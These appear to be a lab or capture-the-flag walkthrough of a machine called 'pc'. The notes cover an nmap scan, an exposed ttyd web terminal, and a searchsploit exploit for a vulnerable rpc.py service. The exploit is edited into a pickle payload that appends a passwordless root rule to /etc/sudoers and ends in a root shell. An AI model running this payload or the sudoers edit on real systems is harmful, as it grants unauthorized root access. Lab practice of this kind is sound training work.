$ sudo nmap -sCV -p- -v -Pn --open 192.168.126.210 > PC.txt
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 62:36:1a:5c:d3:e3:7b:e1:70:f8:a3:b3:1c:4c:24:38 (RSA)
|   256 ee:25:fc:23:66:05:c0:c1:ec:47:c6:bb:00:c7:4f:53 (ECDSA)
|_  256 83:5c:51:ac:32:e5:3a:21:7c:f6:c2:cd:93:68:58:d8 (ED25519)
8000/tcp open  http    ttyd 1.7.3-a2312cb (libwebsockets 3.2.0)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: ttyd/1.7.3-a2312cb (libwebsockets/3.2.0)
|_http-title: ttyd - Terminal
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

port 8000 is a webshell.

Linux pc 5.4.0-156-generic #173-Ubuntu SMP Tue Jul 11 07:25:22 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux

# Found root runing python3 /opt/rpc.py. Search for rpc.py vulnerable.
searchsploit rpc.py
searchsploit -m python/remote/50983.py
# Edit payload to below then upload to shell.
'echo "user ALL=(root) NOPASSWD: ALL" >> /etc/sudoers'

$ python3 rpcpy-exploit.py.1
b'\x80\x04\x95O\x00\x00\x00\x00\x00\x00\x00\x8c\x05posix\x94\x8c\x06system\x94\x93\x94\x8c4echo "user ALL=(root) NOPASSWD: ALL" >> /etc/sudoers\x94\x85\x94R\x94.'
$ id
uid=1000(user) gid=1000(user) groups=1000(user)
$ sudo -l
Matching Defaults entries for user on pc:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User user may run the following commands on pc:
    (root) NOPASSWD: ALL

$ sudo su
id
uid=0(root) gid=0(root) groups=0(root)


